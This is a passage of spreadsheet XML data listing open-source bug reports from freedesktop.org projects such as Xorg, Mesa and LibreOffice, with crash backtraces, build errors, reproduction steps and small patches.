	Expansion ROM at dbff0000 [disabled] [size=64K]
	Kernel modules: s3fb
I have recent xorg git (commit 554592cd70543f87cd8bee5ff47cc8281511e041 branch master) xf86-video-s3 (commit ef1ca4800ee75044243d0eb2346240c50c28f0aa) and libpciaccess (commit 613c1e6d09930bab47f2c6983f220df002c2e2ce). 
Initially server just exited like this:
Fatal server error:                                                             
AddScreen/ScreenInit failed for driver 0
Looking at xf86-video-s3/src/s3_driver.c i found what in function S3MapMem on old (non-NewMMIO) but pciaccess-enabled path function pci_device_map_range was called with pS3-&gt;videoRam * 1024 as third argument. Changing this to pScrn-&gt;videoRam * 1024 allowed server to start. I typed this message with this card 800x600x16bit but still usable ...</t>
  </si>
  <si>
    <t>LIBREOFFICE-78921</t>
  </si>
  <si>
    <t>save embedded fonts in Flat ODF</t>
  </si>
  <si>
    <t>1. Open new document.
2. Under File - Properties - Font choose Embed fonts
3. Save file as flat xml (fodt).
4. Crash</t>
  </si>
  <si>
    <t>juangdse</t>
  </si>
  <si>
    <t>XORG-42173</t>
  </si>
  <si>
    <t>ftbit undefined in xftglyphs.c:573</t>
  </si>
  <si>
    <t>crashes kpdf.
I could work around by defining ftbit = &amp;glyphslot-&gt;bitmap.</t>
  </si>
  <si>
    <t>kdevel</t>
  </si>
  <si>
    <t>TELEPATHY-31387</t>
  </si>
  <si>
    <t>Cut unnecessary sed hacks for Vala bindings</t>
  </si>
  <si>
    <t>With the Vala switch-to-gir branch (which Evan is about to merge) we can cut out the calls to sed (to do some scrubbing for the final telepathy-glib.vapi).</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-56052</t>
  </si>
  <si>
    <t>Created attachment 68660
SSH Public Key
I intend to follow this with a project creation request that I would like to be the maintainer for.  Is this the correct approach or should I have directly filed a project creation request.
The project that I intend to submit is a glibmm frontend for poppler.  I have discussed this with the poppler developers and we decided it would be best to have this in a separate repository.</t>
  </si>
  <si>
    <t>glennricster</t>
  </si>
  <si>
    <t>MESA-65422</t>
  </si>
  <si>
    <t>Rename api_validate.[ch] to draw_validate.[ch]</t>
  </si>
  <si>
    <t>Another simple clean-up task:
The api_validate.c file should probably be renamed as draw_validate.c since all the code in the file is related to validating (error checking) GL drawing commands.
Also update the Makefile/SCons files with the new names.</t>
  </si>
  <si>
    <t>MESA-98297</t>
  </si>
  <si>
    <t>Can't configure a desktop with 3x4k monitors in one row</t>
  </si>
  <si>
    <t>The i965 driver has a limitation of 8kx8k for texture size and this causes issues trying to configure compiz to use say three 4k monitors in one row with recent hardware.</t>
  </si>
  <si>
    <t>XKEYBOARD-CONFIG-1562</t>
  </si>
  <si>
    <t>Swiss layout still in old format</t>
  </si>
  <si>
    <t>Patch follows but it should be carefully reviewed.</t>
  </si>
  <si>
    <t>MESA-93357</t>
  </si>
  <si>
    <t>[HSW] Unreal Atlantis demo - occasional corruption</t>
  </si>
  <si>
    <t>I tried to capture screenshots but was unsuccessful. There are occasional blotches in the final images which look like random data potentially resulting from blit fail resolve fail etc. These mostly only happen in the first and third/fourth scenes not elsewhere. The corruption is reproducible (even looks similar between runs so perhaps not random after all?).
mesa commit 79bff488bc
Haswell gpu: 00:02.0 VGA compatible controller [0300]: Intel Corporation Xeon E3-1200 v3/4th Gen Core Processor Integrated Graphics Controller [8086:0412] (rev 06)
DRI3-enabled DDX (in case it matters).
Demo downloadable from https://wiki.unrealengine.com/Linux_Demos
Run like this: ./Atlantis-Linux-Shipping ResX=640 ResY=480</t>
  </si>
  <si>
    <t>PULSEAUDIO-85011</t>
  </si>
  <si>
    <t>pa_context_connect: flags documentation is misleading</t>
  </si>
  <si>
    <t>enum pa_context_flags states:
PA_CONTEXT_NOFAIL: Don't fail if the daemon is not available when pa_context_connect() is called instead enter PA_CONTEXT_CONNECTING state and wait for the daemon to appear.
in case noautospawn is set (either via flags or using pa client.conf) and no server has been specified pa start listening on DBUS for a new server and the state is PA_CONTEXT_CONNECTING but pa_context_connect returns -1.</t>
  </si>
  <si>
    <t>stefan.bruens</t>
  </si>
  <si>
    <t>MESA-2263</t>
  </si>
  <si>
    <t>Asset failure in via_context.c with full screen window</t>
  </si>
  <si>
    <t>Using latest Mesa CVS with Unichrome DRI and Xorg 6.8.1 I'm getting this assert
failure if my application tries to open a window at the same size as the screen
resolution or calls glutFullScreen().
via_context.c:218: calculate_buffer_parameters: Assertion `vmesa-&gt;back.pitch ==
vmesa-&gt;front.pitch' failed.
The following is enough to trigger it (with screen res at 800x600):
  glutInit(
  glutInitWindowPosition(0 0) 
  glutInitWindowSize( 800 600)
  glutInitDisplayMode(GLUT_RGBA | GLUT_DOUBLE | GLUT_ALPHA)
  if (glutCreateWindow(test) == GL_FALSE) exit(1)
With 'glutInitWindowSize( 799 599)' the asset doesn't fail.</t>
  </si>
  <si>
    <t>POPPLER-22384</t>
  </si>
  <si>
    <t>Wrong rendering of PDF (z-index or transparency)</t>
  </si>
  <si>
    <t>The PDF file at
http://www.greatermunicharea.de/media.pdf?command=getMedia&amp;id=1035
renders incorrectly. There is a big blue circle on top of the map. This circle should be transparent or rendered under the map. xpdf displays it correctly.</t>
  </si>
  <si>
    <t>Dennis.Benzinger</t>
  </si>
  <si>
    <t>TELEPATHY-18737</t>
  </si>
  <si>
    <t>NewChannels signal should contain text and tubes channel when requesting a tubes channel</t>
  </si>
  <si>
    <t>+++ This bug was initially created as a clone of Bug #18736 +++
If you request a tubes channel on a muc which doesn't have a text channel yet the text channel is created before. The NewChannels signal should be fired only once and contain both channels.</t>
  </si>
  <si>
    <t>LIBREOFFICE-79536</t>
  </si>
  <si>
    <t>FILEOPEN: File with charts corrupted and cannot be opened in MS-WORD</t>
  </si>
  <si>
    <t>Created attachment 100281
document contains charts
Problem description: 
Steps to reproduce:
1. Open document in LibreOffice.
2. save as .docx
3. Open in MS Office 2010.
Current behavior:
Document get corrupted.
Expected behavior:
Document should open in MS Office 2010.
Operating System: All
Version: 4.4.0.0.alpha0+ Master</t>
  </si>
  <si>
    <t>MESA-98128</t>
  </si>
  <si>
    <t>nir/tests/control_flow_tests.cpp:79:73: error: â€˜nir_loop_first_cf_nodeâ€™ was not declared in this scope</t>
  </si>
  <si>
    <t>mesa: f96945c5b5c3a52685e76795f03f75c75fb62fc7 (master 12.1.0-devel)
  CXX      nir/tests/nir_tests_control_flow_tests-control_flow_tests.o
nir/tests/control_flow_tests.cpp: In member function â€˜virtual void nir_cf_test_delete_break_in_loop_Test::TestBody()â€™:
nir/tests/control_flow_tests.cpp:79:73: error: â€˜nir_loop_first_cf_nodeâ€™ was not declared in this scope
    nir_block *block_1 = nir_cf_node_as_block(nir_loop_first_cf_node(loop))
                                                                         ^
2ed17d46de045404042f13c6591895a1cf31b167 is the first bad commit
commit 2ed17d46de045404042f13c6591895a1cf31b167
Author: Jason Ekstrand 
Date:   Wed Oct 5 19:08:57 2016 -0700
    nir: Make nir_foo_first/last_cf_node return a block instead
    One of NIR's invariants is that control flow lists always start and end
    with blocks.  There's no good reason why we should return a cf_node from
    these functions since we know that it's always a block.  Making it a block
    lets us remove a bunch of code.
    Signed-off-by: Jason Ekstrand 
    Reviewed-by: Connor Abbott 
:040000 040000 0ecfd382f1e2c6fafb103838f5da4f711b8eeebd 1ed04a96ce72361430d8e7fbfcf62557745a5ecf M	src
bisect run success</t>
  </si>
  <si>
    <t>DRI-26635</t>
  </si>
  <si>
    <t>[drm-radeon-testing] warning message that can't be true</t>
  </si>
  <si>
    <t>Created attachment 33396
dmesg output
Hi there
just pulled latest drm-radeon-testing and updated xf86-video-ati libdrm and mesa to git master.
Now I get this in the kernel log:
You have old &amp; broken userspace please consider updating mesa
(full log attached)
Well this can't be true since userspace is brand new...
Hardware:
01:00.0 VGA compatible controller: ATI Technologies Inc Radeon HD 4770 [RV740]
Greets
Tobias</t>
  </si>
  <si>
    <t>LIBREOFFICE-77776</t>
  </si>
  <si>
    <t>regression: could not start printer when printing to remote cups server</t>
  </si>
  <si>
    <t>Problem description: 
With LibreOffice 4.2.3 when printing to a remote cupsd over a TCP connection the error message Could not start printer. Please check your printer configuration. is displayed but the document is still printed. This did not happen in 4.2.4. Verified with 4.2.3 on Ubuntu 12.04 and 14.04 and with 4.2.4 RC1 on Ubuntu 14.04.
I think this happens to the first job sent on a particular TCP connection. If I send two jobs in a row I see the message on the first job but not the second. If I wait for the CUPS connection timeout to elapse (default 5 minutes) and send another job I see the message again.
Steps to reproduce:
1. Configure CUPS to use a TCP connection: mkdir ~/.cups  echo 'ServerName 127.0.0.1' &gt;&gt; ~/.cups/client.conf
2. Open LibreOffice and print a document.
Current behavior:
An error message is displayed. Howeverthe document is still printed.
Expected behavior:
No error message should appear.</t>
  </si>
  <si>
    <t>ryan</t>
  </si>
  <si>
    <t>POPPLER-71639</t>
  </si>
  <si>
    <t>Do not close stdout in pdftotext</t>
  </si>
  <si>
    <t>Created attachment 89259
Do not close stdout in pdftotext</t>
  </si>
  <si>
    <t>LIBREOFFICE-37958</t>
  </si>
  <si>
    <t>LOCALHELP WIKIHELP:  Calc Function and other Help still references OpenOffice.org</t>
  </si>
  <si>
    <t>As reported on bug 33150 a search for OpenOffice.org in the local installed help turns up many hits.  Most of these are due to several Calc Function pages that use a common footer to direct the user to openoffice.org website for more help.  Similarly the same search in WikiHelp turns up even more hits because the Calc Func help pages were localized into many languages.  This occurs in in a fresh build of branch libreoffice-3-4-0 - believe it affects all versions. 
Some of the hits are entirely valid - OO.org is used to identify the initial version of OO.org for important features like ODF format support.
LocalHelp patch preparation in progress for the bulk of the problem (Calc Func pages) -- remainder will then be reviewed for appropriateness.
Separated from [Task] Bug 33150 for clarity.</t>
  </si>
  <si>
    <t>lemoyne.castle</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-93954</t>
  </si>
  <si>
    <t>Strip TOTP factors from my account on phabricator.freedesktop.org</t>
  </si>
  <si>
    <t>Created attachment 121436
Message
Iâ€™ve changed phones and no longer have access to my old phone which means I can no longer log into my account (pwithnall) on phabricator.freedesktop.org since itâ€™s protected by multi-factor authentication.
https://secure.phabricator.com/book/phabricator/article/multi_factor_auth/#recovering-from-lost-fac
Can the factors please be stripped from my account by an administrator so I can log in again?
Username: pwithnall
Date: Mon  1 Feb 10:50:39 GMT 2016
---
Iâ€™ll attach a GPG-signed version of this message signed with my key (B24FFB9C). Let me know if you want other proof of identity.</t>
  </si>
  <si>
    <t>XORG-24405</t>
  </si>
  <si>
    <t>Commit 5f846360c46f5a989f5d0fde6d251cdbd61d4968 causes lock and machine reboot on a RV370</t>
  </si>
  <si>
    <t>As in summary commit 5f846360c46f5a989f5d0fde6d251cdbd61d4968 causes X to lock at startup and my machine to reboot with xf86-video-ati from git. Reverting that commit fixes the problem.
I can't provide information about the bug or a significant Xorg.0.log because the lock and reboot is so sudden that most of the time the Xorg.0.log file doesn't get written and whenever it exists it is empty. A good log is attached to this post my xorg.conf will follow.
I'm currently using a 2.6.31.2 based kernel xserver 1.6.4 with the DGA patch mesa from git (branch 7.6) and libdrm 2.4.14.</t>
  </si>
  <si>
    <t>ghepeu</t>
  </si>
  <si>
    <t>YTSTENUT-45773</t>
  </si>
  <si>
    <t>yts-plugins make distcheck fails on buildbot</t>
  </si>
  <si>
    <t>In buildbot running make distcheck fails with the following error:
make[2]: Entering directory `/var/lib/buildbot/telepathy/yts-plugins-default-i386/build/tests/twisted'
make[2]: *** No rule to make target `accounts/README' needed by `distdir'.  Stop.
make[2]: Leaving directory `/var/lib/buildbot/telepathy/yts-plugins-default-i386/build/tests/twisted'
make[1]: *** [distdir] Error 1
make[1]: Leaving directory `/var/lib/buildbot/telepathy/yts-plugins-default-i386/build/tests'
make: *** [distdir] Error 1
program finished with exit code 2
See the whole build log here: http://buildbot.telepathy.im:8010/builders/ytstenut-plugins%20-%20i386/builds/36</t>
  </si>
  <si>
    <t>XORG-10016</t>
  </si>
  <si>
    <t>Xephyr/Xnest should set the WM_CLASS property</t>
  </si>
  <si>
    <t>This bug has been reported to the Debian BTS 9 months ago by Christophe Troestler. It was against Xnest but the same bug is valid for Xephyr and I guess Xephyr is more likely to get fixed.
Xnest/Xephyr does not set the WM_CLASS property which makes it difficult to
treat it specially by window managers.
$ xprop
XKLAVIER_STATE(INTEGER) = 0 0
_NET_WM_ICON_GEOMETRY(CARDINAL) = 697 1018 200 32
_NET_WM_STATE(ATOM) =
WM_STATE(WM_STATE):
                window state: Normal
                icon window: 0x0
_NET_FRAME_EXTENTS(CARDINAL) = 5 5 23 5
_NET_WM_DESKTOP(CARDINAL) = 5
_NET_WM_ALLOWED_ACTIONS(ATOM) = _NET_WM_ACTION_MOVE _NET_WM_ACTION_MINIMIZE _NET_WM_ACTION_SHADE _NET_WM_ACTION_CHANGE_DESKTOP _NET_WM_ACTION_CLOSE
WM_NORMAL_HINTS(WM_SIZE_HINTS):
                program specified minimum size: 640 by 480
                program specified maximum size: 640 by 480
WM_NAME(STRING) = Xephyr on :1 ( ctrl+shift grabs mouse and keyboard )
Brice</t>
  </si>
  <si>
    <t>DBUS-34870</t>
  </si>
  <si>
    <t>Add path_prefix match rule</t>
  </si>
  <si>
    <t>This is needed for an optimized implementation of the client-side of the proposed ObjectManager interface see bug 34869. See
 http://lists.freedesktop.org/archives/dbus/2011-March/014170.html
for discussion.</t>
  </si>
  <si>
    <t>XORG-817</t>
  </si>
  <si>
    <t>DMX includes  on non-Linux platforms</t>
  </si>
  <si>
    <t>Attempting to build the post-DMX-merge Xorg tree on Solaris fails in
xc/programs/Xserver/hw/dmx/input since it's not Linux and has no 
header:
cc -c -xO4 -xbuiltin -xlibmil -xpentium -Xa -v     -I. -I..
-I../../../../../exports/include/X11 -I../../../../../include/fonts
-I../../../mi  -I../../../include -I../../../render
-I../../../../../include/extensions  -I../../../../../programs/Xserver/Xext
-I../../../../../programs/Xserver/Xi  -I../../../../..
-I../../../../../exports/include   -Dsun -Di386 -DSVR4 -D__EXTENSIONS__ -D__i386
-DSHAPE -DXINPUT -DXKB -DLBX -DXAPPGROUP -DXCSECURITY -DTOGCUP  -DXF86BIGFONT
-DDPMSExtension  -DPIXPRIV -DPANORAMIX  -DRENDER -DRANDR -DXFIXES -DDAMAGE
-DINCLUDE_ALLOCA_H -DAVOID_GLYPHBLT -DPIXPRIV -DSINGLEDEPTH -DXFreeXDGA
-DXvExtension -DXFree86LOADER -DDLOPEN_HACK -DXFree86Server -DXF86VIDMODE
-DXvMCExtension -DSMART_SCHEDULE -DBUILDDEBUG -DXResExtension
-DX_BYTE_ORDER=X_LITTLE_ENDIAN -DXORG_VERSION_CURRENT=(((6) * 10000000) + ((7)
* 100000) + ((0) * 1000) + 0)
../../../../../programs/Xserver/hw/xfree86/os-support/sunos/ia32.il -D__SOL8__
-DNDEBUG      -DDDXOSINIT -DSERVER_LOCK -DDDXOSFATALERROR -DDDXOSVERRORF
-DMITMISC -DXTEST -DXTRAP -DXSYNC -DXCMISC -DXRECORD -DMITSHM -DBIGREQS
-DXF86VIDMODE -DXF86MISC -DDBE -DDPMSExtension -DEVI -DSCREENSAVER -DXV -DXVMC
-DGLXEXT  -DGLX_USE_MESA    -DRES -UBEZIER  -UPEXEXT  -UMULTIBUFFER  -UXV  -UXIE
 -UDBE  -UXF86VIDMODE  -UXF86MISC  -UXFreeXDGA  -UXF86DRI  -UMITSHM  -UTOGCUP 
-UDPSEXT  -UMITMISC  -USCREENSAVER  -URANDR  -UFONTCACHE  -UXFree86LOADER 
-DXVENDORNAME='The X.Org Foundation' -DXVENDORNAMESHORT='X.Org'  usb-keyboard.c
usb-private.h line 48: cannot find include file: 
usb-private.h line 104: undefined symbol: EV_MAX
usb-private.h line 104: can not declare variably modified type at file scope
usb-keyboard.c line 265: incomplete struct/union/enum input_event: event
usb-keyboard.c line 270: improper member use: time
usb-keyboard.c line 270: warning: left operand of . must be struct/union object
usb-keyboard.c line 271: improper member use: time
usb-keyboard.c line 271: warning: left operand of . must be struct/union object
usb-keyboard.c line 271: cannot access member of non-struct/union object
usb-keyboard.c line 272: improper member use: type
usb-keyboard.c line 272: undefined symbol: EV_LED
usb-keyboard.c line 276: undefined struct/union member: code
usb-keyboard.c line 277: improper member use: value
usb-keyboard.c line 368: incomplete struct/union/enum input_event: raw
usb-keyboard.c line 375: undefined struct/union member: code
usb-keyboard.c line 375: improper member use: value
Looking in the Imakefile usb-keyboard.c is included on all non-SGI platforms.
Either it should be limited to Linux platforms or #ifdef's put in to not use
Linux-only headers on non-Linux platforms.</t>
  </si>
  <si>
    <t>XORG-20692</t>
  </si>
  <si>
    <t>Xorg spinning in intel-driver</t>
  </si>
  <si>
    <t>Created attachment 23922
my Xorg.0.log
I recently encountered a case where Xorg spinned at 100% cpu but the system was still useable. This was 2.6.99 + Xorg-1.6.0_2 (from rawhide).
I collected a few stacktraces no idea how useful they are.</t>
  </si>
  <si>
    <t>XORG-82979</t>
  </si>
  <si>
    <t>Segmentation fault in sna_dri2_get_back()</t>
  </si>
  <si>
    <t>Created attachment 105130
Log
The following crash occurs frequently when I'm logging in or out.  I'm using XFCE with Compton as compositor.  xorg.conf contains only the NoTrapSignals flag everything is default settings.
Dell Latitude E5530
Intel(R) Core(TM) i5-3210M CPU @ 2.50GHz
Arch Linux x86_64
linux 3.16.1-1
xorg-server 1.16.0-6
xf86-video-intel 2.99.914-4
Log file is attached (from an older build than the backtrace below but it's the same crash).  Please let me know if there is any more info that would be useful.
Core was generated by `/usr/bin/Xorg.bin :1 vt7'.
Program terminated with signal SIGSEGV Segmentation fault.
#0  sna_dri2_get_back (info=0x1848b00 back=0x16ef3a0 draw=0x142d180 sna=0x7f7365a25000) at sna_dri2.c:164
164				if (c-&gt;bo &amp;&amp; c-&gt;bo-&gt;scanout == 0) {
(gdb) bt full
#0  sna_dri2_get_back (info=0x1848b00 back=0x16ef3a0 draw=0x142d180 sna=0x7f7365a25000) at sna_dri2.c:164
        c = 0x32000000320
        bo = 
        name = 0
        reuse = true
#1  sna_dri2_reuse_buffer (draw=0x142d180 buffer=0x16ef3a0) at sna_dri2.c:282
        buffer = 0x16ef3a0
        draw = 0x142d180
#2  0x0000000000562e73 in allocate_or_reuse_buffer (pDraw=0x142d180 ds= pPriv=0x16eedd0 
    attachment=1 format=32 dimensions_match= buffer=0x182e460) at dri2.c:483
No locals.
#3  0x0000000000563cab in do_get_buffers (pDraw=0x20 width=0x556 height=0x300 attachments=0x182c4b4 
    count=25463640 out_count=0x1 has_format=1) at dri2.c:551
        attachment = 1
        pPriv = 0x0
        buffers_changed = 0
#4  0x00000000005640db in DRI2GetBuffersWithFormat (pDraw= width= 
    height= attachments= count= out_count=)
    at dri2.c:668
No locals.
#5  0x0000000000565b7b in ProcDRI2GetBuffersWithFormat (client=) at dri2ext.c:306
        buffers = 0x0
        status = 0
        count = 154
        pDrawable = 0x142d180
        width = 8554624
        height = 24045712
#6  ProcDRI2Dispatch (client=0x16ee890) at dri2ext.c:608
        stuff = 0x182c4a0
#7  0x00000000004375c7 in Dispatch () at dispatch.c:432
        clientReady = 0x16f0d30
        result = 
        client = 0x16ee890
        nready = 0
        icheck = 0x82cb00 
        start_tick = 0
#8  0x000000000043b756 in dix_main (argc=3 argv=0x7fff76def158 envp=) at main.c:296
        i = 
        alwaysCheckForInput = {0 1}
#9  0x00007f7363d35000 in __libc_start_main () from /usr/lib/libc.so.6
No symbol table info available.
#10 0x0000000000425bfe in _start ()
No symbol table info available.</t>
  </si>
  <si>
    <t>XORG-89272</t>
  </si>
  <si>
    <t>GM206 does not recognize attached hdmi monitor</t>
  </si>
  <si>
    <t>Created attachment 113732
dmesg with nouveau.debug=debug drm.debug=0xe
Hi
adding this patch on top of linux-3.19 or tip of http://cgit.freedesktop.org/~darktama/nouveau
is enough to get a GM206 / GTX 960 to get 'modprove nouveau' to work and getting output on a VGA monitor attached to the DVI-I port.
However trying the same with a HDMI monitor attached to the hdmi port does not work.
Attached is dmesg output with extra debugging enabled + a 2nd file with debug level=trace enabled.
I have also sent an mmiotrace of that hdmi use-case by mail.</t>
  </si>
  <si>
    <t>DRI-84750</t>
  </si>
  <si>
    <t>[igt] intel-gpu-tools/configure.ac dumper test breaks in non-bash shells</t>
  </si>
  <si>
    <t>Created attachment 107494
Change == to =
In intel-gpu-tools 1.8 the configure.ac tests to enable the register dumper contain the following at line 140:
if test x$DUMPER == xyes then
It ought to be = (like a few lines earlier) not ==. The latter works in bash but not in other shells the configure script breaks if (for example) /bin/sh is dash. Patch attached that just removes one of the =s.</t>
  </si>
  <si>
    <t>SPECIFICATIONS-73497</t>
  </si>
  <si>
    <t>Register the Cinnamon desktop environment</t>
  </si>
  <si>
    <t>Hi everyone
Please register the Cinnamon desktop environment [1] in the spec and update desktop-file-utils so that the name 'Cinnamon' can be used in OnlyShowIn= and NotShowIn=.
Please let me know if you have any questions.
Best
Michael Schaller
[1] http://cinnamon.linuxmint.com/</t>
  </si>
  <si>
    <t>LIBREOFFICE-34897</t>
  </si>
  <si>
    <t>FILESAVE as .ppt mis-rotates text</t>
  </si>
  <si>
    <t>Created attachment 44000
rotations.odp
Downstream bug may be found at:
https://bugs.launchpad.net/ubuntu/+source/libreoffice/+bug/505188
1) lsb_release -rd
Description: Ubuntu natty (development branch)
Release: 11.04
2) apt-cache policy libreoffice-impress
libreoffice-impress:
  Installed: 1:3.3.1-1ubuntu4
  Candidate: 1:3.3.1-1ubuntu4
  Version table:
 *** 1:3.3.1-1ubuntu4 0
        500 http://us.archive.ubuntu.com/ubuntu/ natty/main i386 Packages 100 /var/lib/dpkg/status
3) What is expected to happen is when one performs at the Terminal:
cd ~/Desktop &amp;&amp; wget https://bugs.launchpad.net/ubuntu/+source/openoffice.org/+bug/505188/+attachment/1868399/+files/rotations.odp &amp;&amp; loimpress -nologo rotations.odp
click File -&gt; Save as -&gt; File type: Microsoft PowerPoint 2007 XML (.pptx) -&gt; Save button -&gt; Keep format button -&gt; close file -&gt; reopen via the Terminal:
loimpress -nologo rotations.pptx
the text is displayed as it was in rotations.odp.
4) What happens instead is that the text in rotations.pptx have been rotated erroneously.</t>
  </si>
  <si>
    <t>LIBVA-64624</t>
  </si>
  <si>
    <t>some clips with reference picture marking error</t>
  </si>
  <si>
    <t>./FRExt_MMCO4_Sony_B.264
./FRExt_MMCO4_Sony_B.264 0.315811 0.823194 0.687048 0.929279 0.824431 0.961914 60 61 0</t>
  </si>
  <si>
    <t>LIBREOFFICE-36938</t>
  </si>
  <si>
    <t>Autofill changes unvisible cells in filtered mode</t>
  </si>
  <si>
    <t>Example:
1. Type two columns (first row is header):
AA BB
a
b
a
2. Activate autofilter
3. Filter first column (AA) with content 'a':
AA BB
a
a
4. Type '1' in cell B2:
AA BB
a   1
a
5. Use the autofill handle in cell B2 and drag it one (visible) cell down:
Result:
AA BB
a   1
a   3
and after removing the filter:
AA BB
a   1
b   2
a   3
Expected:
AA BB
a   1
a   2
and after removing the filter:
AA BB
a   1
b   
a   2
For me it's a bug (unexpected behavior).</t>
  </si>
  <si>
    <t>fdorg.x.bouspam</t>
  </si>
  <si>
    <t>DRI-30718</t>
  </si>
  <si>
    <t>evergreen.c bad cast/shift</t>
  </si>
  <si>
    <t>Hi
  Sparse spotted the following and it does look like the wrong order of cast and shift:
drivers/gpu/drm/radeon/evergreen.c:1140:78: warning: right shift by bigger than source value
                efuse_box_bit_127_124 = (u8)(efuse_straps_3 
I think I agree with it that in that the value is truncated to u8 before being
shifted down by 28 and therefore always being 0. So easiest fix I guess is:
                efuse_box_bit_127_124 = (u8)((efuse_straps_3 
Not sure what the effect of this would be it seems to be in some very device specific code.
Dave</t>
  </si>
  <si>
    <t>XORG-11778</t>
  </si>
  <si>
    <t>src/window.c missing NULL check</t>
  </si>
  <si>
    <t>This patch adds the missing NULL check returns then FALSE.
Currently we check return value of malloc() 169 out of 195 times. On this place this will immediatly result in a crash...</t>
  </si>
  <si>
    <t>MESA-68126</t>
  </si>
  <si>
    <t>drm Nouveau fails compile</t>
  </si>
  <si>
    <t>commit d1ba1055d98c246d1ee9d9c14706bb9fba6a98c7
Author: Rico SchÃ¼ller 
Date:   Wed Aug 14 13:17:22 2013 +0200
Error: nouveau_video.c:866:33: error: 'screen' undeclared (first use in this function)
I had someone else in #wayland try the same commit and get the same error as well.</t>
  </si>
  <si>
    <t>grey3050</t>
  </si>
  <si>
    <t>DRI-83870</t>
  </si>
  <si>
    <t>[BYT BSW]HDMI display will show wrong picture on every interlaced scanning resolution</t>
  </si>
  <si>
    <t>Created attachment 106298
dmesg
==System Environment==
--------------------------
Regression: Yes. Good commit:e4964a6e664b4c338b5ab1f1820b0477bec68396(drm-intel-next-queued) 
   drm/i915: Update DRIVER_DATE to 20140606
Non-working platforms: Baytrail
==kernel==
--------------------------
-nightly: 43df30da20447e2856b2761215ff274886a9f931 (fails)
    drm-intel-nightly: 2014y-09m-12d-15h-35m-20s UTC integration manifest
-queued: 648fb42d1e77cf90cddea2b1cf1f4ac4453e65e6 (fails)
    drm/i915: Extend BIOS stolen mem handling to all platform
-fixes: e76c8c5979021483a3a6b480cfe360c644a403c0 (fails)
    drm/i915: Fix SRC_COPY width on 830/845g
==Bug detailed description==
-----------------------------
Monitor Manufacturer: ASUS
Monitor mode veision : PA238Q
HDMI display will show wrong picture on every interlaced scanning resolution. I attach a photo that is what HDMI monitor shows. It's very low probability to show a normal picture. 
Resolution details:
1920x1080i 60 1920 2008 2052 2200 1080 1084 1094 1125 0x15 0x40 74250
1920x1080i 60 1920 2008 2052 2200 1080 1084 1094 1125 0x15 0x40 74176
1920x1080i 50 1920 2448 2492 2640 1080 1084 1094 1125 0x15 0x40 74250
==Reproduce steps==
---------------------------- 
1. ./testdisplay -a
2. check interlaced scanning resolution</t>
  </si>
  <si>
    <t>PORTLAND-99366</t>
  </si>
  <si>
    <t>xdg-open: Add chromium to fallback browsers</t>
  </si>
  <si>
    <t>Created attachment 128896
patch
The list of fallback browsers includes chromium-browser however
current installations of Chromium install the browser as chromium.
(Some Chromium packages used to install chromium-browser due to binary
name conflicts subsequently resolved.)
The attached patch adds chromium to the list of fallback browsers.</t>
  </si>
  <si>
    <t>LIBREOFFICE-77123</t>
  </si>
  <si>
    <t>Arabic: find/search should had option ignore kashida (Tatweel)</t>
  </si>
  <si>
    <t>the problem:
If a file contains any Arabic word with kashida e.g (Ø§Ù„Ø±Ø­Ù…Ù€Ù€Ù€Ù†) and then I searched for the same word without the kashida (Ø§Ù„Ø±Ø­Ù…Ù†). It will return nothing.
For more info about kashida:
http://en.wikipedia.org/wiki/Kashida
Current behavior:
The search result will be empty.
Expected behavior:
Had the option to ignore kashida in the search.</t>
  </si>
  <si>
    <t>LIBREOFFICE-52090</t>
  </si>
  <si>
    <t>Update: Danish dictionary extension version 2.1 - 2012-07-14 is available.</t>
  </si>
  <si>
    <t>Please update the Spellcheck thesaurus and hyphenation dictionaries for
Danish.
Available here:
http://extensions.libreoffice.org/extension-center/stavekontrolden-danish-dictionary</t>
  </si>
  <si>
    <t>esben_aaberg</t>
  </si>
  <si>
    <t>DBUS-3930</t>
  </si>
  <si>
    <t>[PATCH] Add FreeBSD kqueue support to dbus</t>
  </si>
  <si>
    <t>As Linux has dnotify FreeBSD has kqueue for monitoring files and directories. 
The attached patch adds kqueue support for watching for changes in the dbus
config directories.  Note: bus/bus.c needs to be patched to pass the main dbus
loop to the watch add function since kqueue is not signal-driven like dnotify. 
We need to add a watcher to the kqueue file descriptor.</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-104673</t>
  </si>
  <si>
    <t>redirect p11-glue.freedesktop.org to p11-glue.github.io/p11-glue/</t>
  </si>
  <si>
    <t>Hi
 We have moved the web site of p11-glue to github. Would it be possible to redirect the previous site on freedesktop there?
That is redirect 'p11-glue.freedesktop.org' to p11-glue.github.io/p11-glue/</t>
  </si>
  <si>
    <t>n.mavrogiannopoulos</t>
  </si>
  <si>
    <t>HAL-7290</t>
  </si>
  <si>
    <t>Patch: add support for Mandriva pmsuspend</t>
  </si>
  <si>
    <t>The following patch adds support for pmsuspend tool used on Mandriva linux to
suspend to disk or memory laptops.</t>
  </si>
  <si>
    <t>XORG-9652</t>
  </si>
  <si>
    <t>Bad markup in XDrawArc.3x</t>
  </si>
  <si>
    <t>1. Use of low-level troff hackery to set special indents or breaks can't
be translated. The page will have rendering faults in HTML and
probably also under third-party man page browsers such as Xman
Rosetta and the KDE help browser.  This patch eliminates .br .ta .ti
and .in in favor of requests like .nf/.fi and .RS/.RE that have
structural translations.
2. TBL markup not used where it should be.  Tables stitched together
with .ta requests can't be lifted to DocBook and will often
choke third-party viewers such as TKMan XMan Rosetta etc.
--- XDrawArc.3x-orig	2007-01-14 02:18:05.000000000 -0500
+++ XDrawArc.3x	2007-01-14 02:20:34.000000000 -0500
@@ -1426 +14216 @@
 .el .sp 10p
 ..
 .ny0
+.de EX
+.sp
+.nf
+.ft CW
+..
+.de EE
+.ft R
+.fi
+.sp
+..
 '\ e
 .TH XDrawArc 3X11 libX11 1.0.3 X Version 11 XLIB FUNCTIONS
 .SH NAME
@@ -24013 +25012 @@
 returns a value in the range % [ - pi over 2  ~pi over 2  ] %
 and adjust is:
 .LP
-.Ds
-.TA 1i 2i
-.ta 1i 2i
+.TS
+l l.
 %0%	for normal-angle in the range % [ 0  ~pi over 2  ]%
 %pi%	for normal-angle in the range % [ pi over 2  ~{3 pi} over 2  ]%
 %2 pi%	for normal-angle in the range % [ {3 pi} over 2  ~2 pi  ]%
-.De
+.TE
 .LP
 For any given arc 
 .ZN XDrawArc
@@ -29515 +30413 @@
 .ZN XArc
 structure contains:
 .LP
-.Ds 0
-.TA .5i 3i
-.ta .5i 3i
+.EX
 typedef struct {
 	short x y
 	unsigned short width height
 	short angle1 angle2             /\(** Degrees * 64 */
